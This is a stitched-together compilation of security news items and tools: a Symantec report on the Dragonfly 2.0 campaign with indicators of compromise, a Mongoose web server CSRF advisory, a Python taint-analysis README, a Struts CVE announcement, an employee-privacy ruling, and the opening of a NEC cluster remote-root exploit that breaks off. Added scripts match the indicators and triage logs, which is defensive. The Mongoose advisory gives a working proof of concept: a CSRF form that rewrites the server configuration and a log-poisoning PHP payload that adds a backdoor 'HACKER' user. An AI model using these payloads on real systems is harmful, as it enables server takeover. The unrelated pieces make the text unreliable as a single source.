Symantec has evidence indicating that the Dragonfly 2.0 campaign has been underway since at least December 2015 and has identified a distinct increase in activity in 2017. Symantec has strong indications of attacker activity in organizations in the U.S., Turkey, and Switzerland, with traces of activity in organizations outside of these countries. The U.S. and Turkey were also among the countries targeted by Dragonfly in its earlier campaign, though the focus on organizations in Turkey does appear to have increased dramatically in this more recent campaign.

As it did in its prior campaign between 2011 and 2014, Dragonfly 2.0 uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software.

The earliest activity identified by Symantec in this renewed campaign was a malicious email campaign that sent emails disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015. The group conducted further targeted malicious email campaigns during 2016 and into 2017. The emails contained very specific content related to the energy sector, as well as some related to general business concerns. Once opened, the attached malicious document would attempt to leak victims’ network credentials to a server outside of the targeted organization.

In July, Cisco blogged about email-based attacks targeting the energy sector using a toolkit called Phishery. Some of the emails sent in 2017 that were observed by Symantec were also using the Phishery toolkit (Trojan.Phisherly) to steal victims’ credentials via a template injection attack. This toolkit became generally available on GitHub in late 2016.

As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials, by compromising websites that were likely to be visited by those involved in the energy sector. The stolen credentials were then used in follow-up attacks against the target organizations. In one instance, after a victim visited one of the compromised servers, Backdoor.Goodor was installed on their machine via PowerShell 11 days later. Backdoor.Goodor provides the attackers with remote access to the victim’s machine.

In 2014, Symantec observed the Dragonfly group compromise legitimate software in order to deliver malware to victims, a practice also employed in the earlier 2011 campaigns. In the 2016 and 2017 campaigns the group is using the evasion framework Shellter in order to develop Trojanized applications. In particular, Backdoor.Dorshel was delivered as a trojanized version of standard Windows applications.

Symantec also has evidence to suggest that files masquerading as Flash updates may be used to install malicious backdoors onto target networks—perhaps by using social engineering to convince a victim they needed to download an update for their Flash player. Shortly after visiting specific URLs, a file named “install_flash_player.exe” was seen on victim computers, followed shortly by the Trojan.Karagany.B backdoor.

Typically, the attackers will install one or two backdoors onto victim computers to give them remote access and allow them to install additional tools if necessary. Goodor, Karagany.B, and Dorshel are examples of backdoors used, along with Trojan.Heriplor.

Strong links with earlier campaigns

There are a number of indicators linking recent activity with earlier Dragonfly campaigns. In particular, the Heriplor and Karagany Trojans used in Dragonfly 2.0 were both also used in the earlier Dragonfly campaigns between 2011 and 2014.

Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is behind the more recent attacks. This custom malware is not available on the black market, and has not been observed being used by any other known attack groups. It has only ever been seen being used in attacks against targets in the energy sector.

Trojan.Karagany.B is an evolution of Trojan.Karagany, which was previously used by Dragonfly, and there are similarities in the commands, encryption, and code routines used by the two Trojans. Trojan.Karagany.B doesn’t appear to be widely available, and has been consistently observed being used in attacks against the energy sector. However, the earlier Trojan.Karagany was leaked on underground markets, so its use by Dragonfly is not necessarily exclusive.

| Feature                            | Dragonfly (2013-2014) | Dragonfly 2.0 (2015-2017) | Link strength |
| Backdoor.Oldrea                    | Yes                   | No                        | None          |
| Trojan.Heriplor (Oldrea stage II)  | Yes                   | Yes                       | Strong        |
| Trojan.Karagany                    | Yes                   | Yes (Trojan.Karagany.B)   | Medium-Strong |
| Trojan.Listrix (Karagany stage II) | Yes                   | Yes                       | Medium-Strong |
| “Western” energy sector targeted   | Yes                   | Yes                       | Medium        |
| Strategic website compromises      | Yes                   | Yes                       | Weak          |
| Phishing emails                    | Yes                   | Yes                       | Weak          |
| Trojanized applications            | Yes                   | Yes                       | Weak          |

Figure 2. Links between current and earlier Dragonfly cyber attack campaigns

Potential for sabotage

Sabotage attacks are typically preceded by an intelligence-gathering phase where attackers collect information about target networks and systems and acquire credentials that will be used in later campaigns. The most notable examples of this are Stuxnet and Shamoon, where previously stolen credentials were subsequently used to administer their destructive payloads.

The original Dragonfly campaigns now appear to have been a more exploratory phase where the attackers were simply trying to gain access to the networks of targeted organizations. The Dragonfly 2.0 campaigns show how the attackers may be entering into a new phase, with recent campaigns potentially providing them with access to operational systems, access that could be used for more disruptive purposes in future. The most concerning evidence of this is in their use of screen captures.
In one particular instance the attackers used a clear format for naming the screen capture files, [machine description and location].[organization name]. The string “cntrl” (control) is used in many of the machine descriptions, possibly indicating that these machines have access to operational systems. Clues or false flags? While Symantec cannot definitively determine Dragonfly’s origins, this is clearly an accomplished attack group. It is capable of compromising targeted organizations through a variety of methods; can steal credentials to traverse targeted networks; and has a range of malware tools available to it, some of which appear to have been custom developed. Dragonfly is a highly focused group, carrying out targeted attacks on energy sector targets since at least 2011, with a renewed ramping up of activity observed in the last year. Some of the group’s activity appears to be aimed at making it more difficult to determine who precisely is behind it: The attackers used more generally available malware and “living off the land” tools, such as administration tools like PowerShell, PsExec, and Bitsadmin, which may be part of a strategy to make attribution more difficult. The Phishery toolkit became available on Github in 2016, and a tool used by the group—Screenutil—also appears to use some code from CodeProject. The attackers also did not use any zero days. As with the group’s use of publicly available tools, this could be an attempt to deliberately thwart attribution, or it could indicate a lack of resources. Some code strings in the malware were in Russian. However, some were also in French, which indicates that one of these languages may be a false flag. Conflicting evidence and what appear to be attempts at misattribution make it difficult to definitively state where this attack group is based or who is behind it. 
What is clear is that Dragonfly is a highly experienced threat actor, capable of compromising numerous organizations, stealing information, and gaining access to key systems. What it plans to do with all this intelligence has yet to become clear, but its capabilities do extend to materially disrupting targeted organizations should it choose to do so. Protection Symantec customers are protected against Dragonfly activity, Symantec has also made efforts to notify identified targets of recent Dragonfly activity. Symantec has the following specific detections in place for the threats called out in this blog: Trojan.Phisherly Backdoor.Goodor Trojan.Karagany.B Backdoor.Dorshel Trojan.Heriplor Trojan.Listrix Trojan.Karagany Symantec has also developed a list of Indicators of Compromise to assist in identifying Dragonfly activity: Family MD5 Command & Control Backdoor.Dorshel b3b5d67f5bbf5a043f5bf5d079dbcb56 hxxp://103.41.177.69/A56WY Trojan.Karagany.B 1560f68403c5a41e96b28d3f882de7f1 hxxp://37.1.202.26/getimage/622622.jpg Trojan.Heriplor e02603178c8c47d198f7d34bcf2d68b8 Trojan.Listrix da9d8c78efe0c6c8be70e6b857400fb1 Hacktool.Credrix a4cf567f27f3b2f8b73ae15e2e487f00 Backdoor.Goodor 765fcd7588b1d94008975c4627c8feb6 Trojan.Phisherly 141e78d16456a072c9697454fc6d5f58 184.154.150.66 Screenutil db07e1740152e09610ea826655d27e8d Customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have previously received reporting on the Dragonfly 2.0 group, which included methods of detecting and thwarting the activities of this adversary. Best Practices Dragonfly relies heavily on stolen credentials to compromise a network. Important passwords, such as those with high privileges, should be at least 8-10 characters long (and preferably longer) and include a mixture of letters and numbers. Encourage users to avoid reusing the same passwords on multiple websites and sharing passwords with others should be forbidden. 
Delete unused credentials and profiles and limit the number of administrative-level profiles created. Employ two-factor authentication (such as Symantec VIP) to provide an additional layer of security, preventing any stolen credentials from being used by attackers. Emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point failures in any specific technology or protection method. This should include the deployment of regularly updated firewalls as well as gateway antivirus, intrusion detection or protection systems (IPS), website vulnerability with malware protection, and web security gateway solutions throughout the network. Implement and enforce a security policy whereby any sensitive data is encrypted at rest and in transit. Ensure that customer data is encrypted as well. This can help mitigate the damage of potential data leaks from within an organization. Implement SMB egress traffic filtering on perimeter devices to prevent SMB traffic leaving your network onto the internet. Educate employees on the dangers posed by spear-phishing emails, including exercising caution around emails from unfamiliar sources and opening attachments that haven’t been solicited. A full protection stack helps to defend against emailed threats, including Symantec Email Security.cloud, which can block email-borne threats, and Symantec Endpoint Protection, which can block malware on the endpoint. Symantec Messaging Gateway’s Disarm technology can also protect computers from threats by removing malicious content from attached documents before they even reach the user. Understanding the tools, techniques, and procedures (TTP) of adversaries through services like DeepSight Adversary Intelligence fuels effective defense from advanced adversaries like Dragonfly 2.0. 
Beyond technical understanding of the group, strategic intelligence that informs the motivation, capability, and likely next moves of the adversaries ensures more timely and effective decisions in proactively safeguarding your environment from these threats. Source
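The indicator table above is the kind of thing a defender turns straight into a matcher. The following is an added example in Python, not Symantec's code and not part of the post, that loads the published MD5 hashes and command-and-control entries, refangs the "hxxp" URLs, checks file contents by hash and scans proxy-log lines for the C2 hosts. The proxy log format, the sample lines and the sample file bytes are constructed for the demo and are not from the post.

```python
"""Match the Dragonfly 2.0 indicators published in the post (added example)."""
import hashlib
import os
import re

# Indicator table exactly as published: (family, MD5, command-and-control).
# C2 entries are kept defanged ("hxxp") as in the post; refang() undoes that.
DRAGONFLY_IOCS = [
    ("Backdoor.Dorshel",  "b3b5d67f5bbf5a043f5bf5d079dbcb56", "hxxp://103.41.177.69/A56WY"),
    ("Trojan.Karagany.B", "1560f68403c5a41e96b28d3f882de7f1", "hxxp://37.1.202.26/getimage/622622.jpg"),
    ("Trojan.Heriplor",   "e02603178c8c47d198f7d34bcf2d68b8", None),
    ("Trojan.Listrix",    "da9d8c78efe0c6c8be70e6b857400fb1", None),
    ("Hacktool.Credrix",  "a4cf567f27f3b2f8b73ae15e2e487f00", None),
    ("Backdoor.Goodor",   "765fcd7588b1d94008975c4627c8feb6", None),
    ("Trojan.Phisherly",  "141e78d16456a072c9697454fc6d5f58", "184.154.150.66"),
    ("Screenutil",        "db07e1740152e09610ea826655d27e8d", None),
]


def refang(indicator):
    """Turn a defanged 'hxxp' URL back into a real scheme for comparison."""
    return indicator.replace("hxxp", "http")


def c2_host(indicator):
    """Extract the host part of a URL or bare IP indicator."""
    match = re.match(r"^(?:https?://)?([^/:]+)", refang(indicator))
    return match.group(1) if match else None


HASH_INDEX = {md5: family for family, md5, _ in DRAGONFLY_IOCS}
HOST_INDEX = {c2_host(c2): family for family, _, c2 in DRAGONFLY_IOCS if c2}


def match_file_bytes(data):
    """Return the family name if the MD5 of `data` is a published indicator."""
    return HASH_INDEX.get(hashlib.md5(data).hexdigest())


def scan_directory(root):
    """Hash every file under `root` and return [(path, family)] for matches."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    family = match_file_bytes(fh.read())
            except OSError:
                continue
            if family:
                hits.append((path, family))
    return hits


# Constructed proxy log format (assumption, not from the post):
# "<date> <time> <client-ip> <method> <url> <status>"
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def scan_proxy_log(lines):
    """Return [(client, host, family)] for requests to a published C2 host."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line.strip())
        if not m:
            continue
        family = HOST_INDEX.get(c2_host(m.group("url")))
        if family:
            hits.append((m.group("src"), c2_host(m.group("url")), family))
    return hits


# Constructed sample log lines for the demo.
SAMPLE_PROXY_LOG = [
    "2017-09-06 10:14:02 10.20.0.15 GET http://103.41.177.69/A56WY 200",
    "2017-09-06 10:14:07 10.20.0.15 GET http://www.example.com/index.html 200",
    "2017-09-06 10:15:33 10.20.0.42 POST http://184.154.150.66/ 200",
]

if __name__ == "__main__":
    for client, host, family in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} contacted {host} ({family})")
```

Hash matching is only as good as the eight published samples; the host matching is what catches the follow-on beacons, so it is worth feeding the C2 hosts to the perimeter SMB and web egress controls the best practices above recommend rather than keeping them in an offline script.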
  15. CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx )

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
[+] ISR: apparitionSec

Vendor:
===============
www.cesanta.com

Product:
==================
Mongoose Web Server (Free Edition)
Mongoose-free-6.5.exe

Download: https://cesanta.com/binary.html

Mongoose - GitHub's most popular embedded web server and multi-protocol networking library

Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more.

Vulnerability Type:
===================
CSRF - Command Execution

CVE Reference:
==============
CVE-2017-11567

Security Issue:
================
Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visiting an attacker controlled web page can execute system commands on the system hosting the Mongoose server.

However, IF Mongoose web server is installed as a service then executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service.

When Mongoose is run in standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on the server like .PHP etc. to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated file, after injecting commands into the Mongoose web server's log file that will get executed when the log file is later requested.

This vulnerability requires the CGI interpreter to be already set or some information about the target to be known, like the CGI path and language "pl,php,cgi" used, so that we can set the correct programming language when the file is created during the initial CSRF attack.

Note: If running commands with arguments, we have to use "\t" tab chars as using a space will break our TELNET based code injection to the server log.

e.g.

GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1

OR just TELNET to the Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.

After Command Injection "Mongoose.conf" will be:

# Mongoose web server configuration file.
# For detailed description of every option, visit
# https://github.com/cesanta/Mongoose
# Lines starting with '#' and empty lines are ignored.
# To make a change, remove leading '#', modify option's value,
# save this file and then restart Mongoose.

# access_control_list
access_log_file C:\Mongoose.access.php <======= BOOM
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe <====== MUST BE SET
# cgi_pattern **.cgi$|**.pl$|**.php$
# dav_auth_file
# dav_root
# debug 0
document_root C:\
# enable_directory_listing yes
# error_log_file
# extra_headers
# extra_mime_types
# global_auth_file
# hide_files_patterns
# hexdump_file
index_files Mongoose.access.php <======== BOOM
# listening_port 8080
# run_as_user
# ssi_pattern **.shtml$|**.shtm$
# ssl_certificate
# ssl_ca_certificate
# start_browser yes
# url_rewrites

Mongoose log file Command Inject to create backdoor.
-----------------------------------------------------------
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -

Tested Windows 7.

Exploit/POC:
=============

1) add backdoor account POC.

<form action="http://127.0.0.1:8080/__mg_admin?save"; method="post">
<input type="hidden" name="access_log_file" value="Mongoose.access.php">
<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.php">
<input type="hidden" name="index_files" value="Mongoose.access.php">
<input type="hidden" name="cgi_interpreter" value="c:\xampp\php\php.exe">
<script>document.forms[0].submit()</script>
</form>

2) TELNET x.x.x.x 8080

GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
Enter
Enter

TELNET x.x.x.x 8080

GET / HTTP/1.1
Enter
Enter

Done, backdoor added!

====================

1) run calc.exe POC.

<form action="http://127.0.0.1:8080/__mg_admin?save"; method="post">
<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.exe">
<input type="hidden" name="index_files" value="../../../../../../Windows/system32/calc.exe">
<input type="hidden" name="cgi_interpreter" value="../../../../../../Windows/system32/calc.exe">
<script>document.forms[0].submit()</script>
</form>

2) TELNET x.x.x.x 8080

GET / HTTP/1.1
Enter
Enter

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=================================
Vendor Notification: July 23, 2017
Vendor Notification: July 28, 2017
Vendor Acknowledgement: July 31, 2017
Vendor Fixed released version 6.9 : September 4, 2017
September 4, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: http://seclists.org/bugtraq/2017/Sep/4
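Two of the signals in this advisory are visible in the Mongoose access log it reproduces: a request line that is not "method plus path" (the poisoned entry, logged with status 400) and a configuration save that was not initiated from the admin UI (the CSRF form posts to /__mg_admin?save from a foreign page). The following is an added example in Python, not the advisory author's code, that triages log lines of that shape. The sample lines are constructed to match the format shown above, with a harmless echo standing in for the advisory's payload; the referer rule assumes that the admin UI's own requests carry a same-host Referer, as the get_settings lines in the log do.

```python
"""Triage Mongoose access-log lines for log poisoning and cross-site config saves (added example)."""
from urllib.parse import urlsplit

HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}
# Server-side script markers that have no business in a request line.
SCRIPT_MARKERS = ("<?", "<%", "<script", "<!--#")
CONFIG_SAVE_PATH = "/__mg_admin?save"  # endpoint the CSRF form in the advisory posts to


def parse_line(line):
    """Split one line of the log format shown in the advisory:
    '<date> <time> - <client> <host or -> <request ...> <status> <bytes> <referer>'.
    The request is kept as a token list so a poisoned entry is not lost in parsing."""
    parts = line.split()
    if len(parts) < 9 or parts[2] != "-":
        return None
    return {
        "time": parts[0] + " " + parts[1],
        "client": parts[3],
        "host": parts[4],
        "request": parts[5:-3],   # normally ['GET', '/path']
        "status": parts[-3],
        "referer": parts[-1],
    }


def triage(line):
    """Return the list of reasons a line looks like poisoning or a cross-site save (empty if clean)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable line"]
    reasons = []
    req = rec["request"]
    well_formed = len(req) == 2 and req[0] in HTTP_METHODS and req[1].startswith("/")
    if not well_formed:
        reasons.append("malformed request line (possible log poisoning)")
    joined = " ".join(req).lower()
    if any(marker in joined for marker in SCRIPT_MARKERS):
        reasons.append("script marker in request line (log poisoning payload)")
    if well_formed and req[1] == CONFIG_SAVE_PATH:
        server_host = rec["host"].split(":")[0]
        ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
        if ref_host != server_host:
            reasons.append("config save with missing or foreign referer (possible CSRF)")
    return reasons


def triage_log(lines):
    """Run triage over a whole log; returns [(line_index, reason), ...]."""
    return [(i, reason) for i, line in enumerate(lines) for reason in triage(line)]


# Constructed sample in the advisory's log format (the injected line uses a
# harmless echo, and the literal backslash-t is kept as the log would show it).
SAMPLE_LOG = [
    "2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -",
    "2017-07-24 03:12:41 - 127.0.0.1 127.0.0.1:8080 POST /__mg_admin?save 200 12 http://evil.example/csrf.html",
    r"2017-07-24 03:12:30 - 127.0.0.1 - GET<?php\techo(1);?> 400 0 -",
    "2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -",
    "2017-07-24 03:13:02 - 127.0.0.1 127.0.0.1:8080 POST /__mg_admin?save 200 12 http://127.0.0.1:8080/__mg_admin",
]

if __name__ == "__main__":
    for index, reason in triage_log(SAMPLE_LOG):
        print(f"line {index}: {reason}")
```

The referer check is a triage heuristic rather than a fix: the real mitigation for CVE-2017-11567 is the vendor's 6.9 release, and for any admin endpoint it is a per-session CSRF token plus an Origin check, since a Referer can be absent for legitimate reasons.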
  16. Python Taint

Static analysis of Python web applications based on theoretical foundations (Control flow graphs, fixed point, dataflow analysis)

Features:
Detect Command injection
Detect SQL injection
Detect XSS
Detect directory traversal
Get a control flow graph
Get a def-use and/or a use-def chain
Search GitHub and analyse hits with PyT
Scan intraprocedural or interprocedural
A lot of customisation possible

Example usage and output:

Install:
git clone https://github.com/python-security/pyt.git
python setup.py install
pyt -h

Usage from Source:

Using it like a user
python -m pyt -f example/vulnerable_code/XSS_call.py save -du

Running the tests
python -m tests

Running an individual test file
python -m unittest tests.import_test

Running an individual test
python -m unittest tests.import_test.ImportTest.test_import

Contributions:
Join our slack group: https://pyt-dev.slack.com/ - ask for invite: mr.thalmann@gmail.com

Guidelines

Virtual env setup guide:

Create a directory to hold the virtual env and project
mkdir ~/a_folder
cd ~/a_folder

Clone the project into the directory
git clone https://github.com/python-security/pyt.git

Create the virtual environment
python3 -m venv ~/a_folder/

Check that you have the right versions
python --version
sample output Python 3.6.0
pip --version
sample output pip 9.0.1 from /Users/kevinhock/a_folder/lib/python3.6/site-packages (python 3.6)

Change to project directory
cd pyt

Install dependencies
pip install -r requirements.txt
pip list
sample output:
gitdb (0.6.4)
GitPython (2.0.8)
graphviz (0.4.10)
pip (9.0.1)
requests (2.10.0)
setuptools (28.8.0)
smmap (0.9.0)

In the future, just type source ~/a_folder/bin/activate to start developing.

Download pyt-master.zip

Source: https://github.com/python-security/pyt
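To make concrete what "fixed point" and "dataflow analysis" mean for the injection and XSS checks listed above, here is an added example in Python: a deliberately small, flow-insensitive taint analysis over the AST. It is not PyT's code and is much simpler than PyT (PyT builds a control flow graph and is flow-sensitive); the source, sink and sanitizer tables are assumptions for the demo, and the sample application below is constructed, not one of PyT's example files.

```python
"""Toy intraprocedural taint analysis in the spirit of PyT (added example, not PyT's code)."""
import ast

# Assumed tables for the demo; PyT ships its own definitions of these.
SOURCES = {"request.args.get", "request.form.get", "input"}
SINKS = {
    "os.system": "command injection",
    "subprocess.call": "command injection",
    "cursor.execute": "SQL injection",
    "make_response": "XSS",
    "render_template_string": "XSS",
}
SANITIZERS = {"escape", "markupsafe.escape", "shlex.quote", "int"}


def dotted_name(node):
    """'os.system' for Attribute/Name chains; None for anything else (e.g. a call on a literal)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def is_tainted(expr, tainted):
    """Conservative taint check: a source call, a tainted variable, or any
    expression built from one is tainted; a sanitizer call cleans its result."""
    if isinstance(expr, ast.Name):
        return expr.id in tainted
    if isinstance(expr, ast.Call):
        callee = dotted_name(expr.func)
        if callee in SOURCES:
            return True
        if callee in SANITIZERS:
            return False
    # Unknown call, BinOp, f-string, subscript, ...: taint flows through any operand.
    return any(is_tainted(child, tainted) for child in ast.iter_child_nodes(expr))


def analyze_function(fn):
    """Fixed point over one function: grow the set of tainted names until
    nothing changes (this handles loops and chains of assignments), then
    report every sink call that receives tainted data."""
    tainted = set()
    changed = True
    while changed:
        changed = False
        for node in ast.walk(fn):
            if isinstance(node, (ast.Assign, ast.AugAssign)):
                targets = node.targets if isinstance(node, ast.Assign) else [node.target]
                for target in targets:
                    if (isinstance(target, ast.Name) and target.id not in tainted
                            and is_tainted(node.value, tainted)):
                        tainted.add(target.id)
                        changed = True
    findings = []
    for node in ast.walk(fn):
        if isinstance(node, ast.Call):
            callee = dotted_name(node.func)
            args = list(node.args) + [kw.value for kw in node.keywords]
            if callee in SINKS and any(is_tainted(a, tainted) for a in args):
                findings.append((fn.name, node.lineno, callee, SINKS[callee]))
    return findings


def analyze_source(src):
    """Return [(function, line, sink, vulnerability class)] for a module's source text."""
    tree = ast.parse(src)
    return [finding
            for node in ast.walk(tree) if isinstance(node, ast.FunctionDef)
            for finding in analyze_function(node)]


# Constructed sample application: one XSS, one sanitized variant, one command injection.
SAMPLE_APP = '''
import os
from flask import request, make_response
from markupsafe import escape

def greet():
    name = request.args.get("name")
    return make_response("Hello " + name)

def greet_safe():
    safe = escape(request.args.get("name"))
    return make_response("Hello " + safe)

def ping():
    host = request.args.get("host")
    cmd = "ping -c 1 " + host
    os.system(cmd)
'''

if __name__ == "__main__":
    for function, line, sink, kind in analyze_source(SAMPLE_APP):
        print(f"{function}:{line} {kind} via {sink}")
```

Because the analysis is flow-insensitive, a variable that is reassigned to its own sanitized value (name = escape(name)) would still be reported; that is exactly the imprecision the control flow graph and def-use chains in PyT's feature list exist to remove.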
  17. Many happy returns!
  18. Security researchers at lgtm.com have discovered a critical remote code execution vulnerability in Apache Struts, a popular open-source framework for developing web applications in the Java programming language. All versions of Struts since 2008 are affected; all web applications using the framework’s popular REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency. This vulnerability has been addressed in Struts version 2.5.13.

lgtm provides free software engineering analytics for open-source projects; at the time this post is published, over 50,000 projects are continuously monitored. Anyone can write their own analyses, ranging from checks for enforcing good coding practices to advanced analyses to find security vulnerabilities. The lgtm security team actively helps the open-source community to uncover critical security vulnerabilities in OSS projects.

This particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data. The lgtm security team have a simple working exploit for this vulnerability which will not be published at this stage. At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon.

The Apache Struts development team have confirmed the severity of this issue and released a patch today:

The Struts maintainers have posted an announcement on their website and the vulnerability has been assigned CVE 2017-9805. More information about how this vulnerability was found using lgtm.com is available in a separate blog post.

Analyst Fintan Ryan at RedMonk estimates that at least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework. Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is.

When asked for a comment, the Chief Information Security Officer of a Tier 1 bank confirmed that Struts is still used in large numbers of applications and that this finding poses a real threat:

Man Yue Mo, one of the lgtm security researchers who discovered this vulnerability, confirms the criticality:

He has written a blog post that describes in more detail how he found this particular vulnerability using the flexible and powerful query language at the heart of lgtm.

The lgtm queries flag up software problems and security vulnerabilities on a daily basis. The analysis results for a large number of projects are readily available on lgtm.com, including for popular projects like Hadoop, Jetty, Maven, and Storm, all of which have millions of users, and are the building blocks of famous platforms like Twitter, Spotify, Google, and Amazon.

Oege de Moor, CEO and founder of Semmle (the company behind lgtm):

The technology that powers lgtm is used by many organizations to analyze their software development process and find security vulnerabilities like the one in Struts. These organizations include:

Source: https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
  19. JarToExeJni.exe:
https://www.virustotal.com/#/file/31f21ea5237194c243f3d82ba6aec9386ebbbae4adec2c5793ca9f721f3c7bee/detection
https://malwr.com/analysis/NDZlMmViYjE1YTkzNGUzM2I1NDJlZDVlYjI2NTBkN2E/

JarToExeProc.exe
https://www.virustotal.com/#/file/6d817562b86972822e4f9031736482c433cc100623098037bc42a5a82fdf786e/detection
https://malwr.com/analysis/NTYyNTJiMzQ1YTJjNDJmYWI1MjdlNWU1NzQzYzI5MjU/
  20. Finally, European companies must inform employees in advance if their work email accounts are being monitored.

The European Court of Human Rights (ECHR) on Tuesday gave a landmark judgement concerning privacy in the workplace by overturning an earlier ruling that gave employers the right to spy on workplace communications.

The new ruling came in judging the case of Romanian engineer Bogdan Barbulescu, who was fired ten years ago for sending messages to his fiancée and brother using his workplace Yahoo Messenger account.

Earlier Romanian courts had rejected Barbulescu’s complaint that his employer had violated his right to correspondence, including in January last year when it was ruled that it was not "unreasonable for an employer to want to verify that the employees are completing their professional tasks during working hours."

But now, the European court ruled by an 11-6 majority that Romanian judges failed to protect Barbulescu’s right to private life and correspondence, as set out in article 8 of the European Convention on Human Rights.

Apparently, Barbulescu's employer had infringed his right to privacy by not informing him in advance that the company was monitoring his account and communications. His employer used surveillance software in order to monitor his computer activities.

The ruling will now become law in 47 countries that have ratified the European Convention on Human Rights.

In a Q & A section on its website, the European Court of Human Rights says the judgement doesn't mean that companies can't now monitor their employees’ communications in the workplace and that they can still dismiss employees for private use.

However, the ECHR says that the employers must inform their staff in advance if their communications are being monitored, and that the monitoring must be carried out for legitimate purposes and limited.

Via thehackernews.com
  21. NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster configuration and management. The underlying webserver 'clpwebmc' runs as root and accepts connections on TCP port 29003 which can be initiated without authentication in the default installation.

/*
 * 2017 update: as of 3.3.4 this bug seems to be fixed
 * - fixed versions:
 *   NEC EXPRESSCLUSTER X 3.3.4-1 for Linux(amd64)
 *   NEC EXPRESSCLUSTER X SingleServerSafe 3.3.4-1 for Linux(amd64)
 */

/*
 * *** THIS IS PRIVATE + UNPUBLISHED (0-DAY) SOURCE CODE, DO NOT DISTRIBUTE ***
 *
 * NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte 2015
 * <vincitamorpatriae@gmail.com>
 *
 * - product description:
 *   NEC EXPRESS CLUSTER is a family of integrated high availability and disaster
 *   recovery software solutions that address the fast recovery and continuous
 *   protection needs of business critical applications and data. With increased
 *   servers and complexity of server applications running Windows or Linux,
 *   EXPRESS CLUSTER minimizes planned and unplanned system outages.
 *
 * - vulnerability description:
 *   NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster
 *   configuration and management. The underlying webserver 'clpwebmc' runs as
 *   root and accepts connections on TCP port 29003 which can be initiated without
 *   authentication in the default installation.
 *
 *   A function is available to remove temporary work directories by issuing the
 *   following GET request to port 29003, appended with the location of the
 *   directory that is supposed to be deleted:
 *   GET /DeleteWorkDirectory.js?WorkGuid=directoryname
 *
 *   The working of the DeleteWorkDirectory.js HTTP request roughly translates to
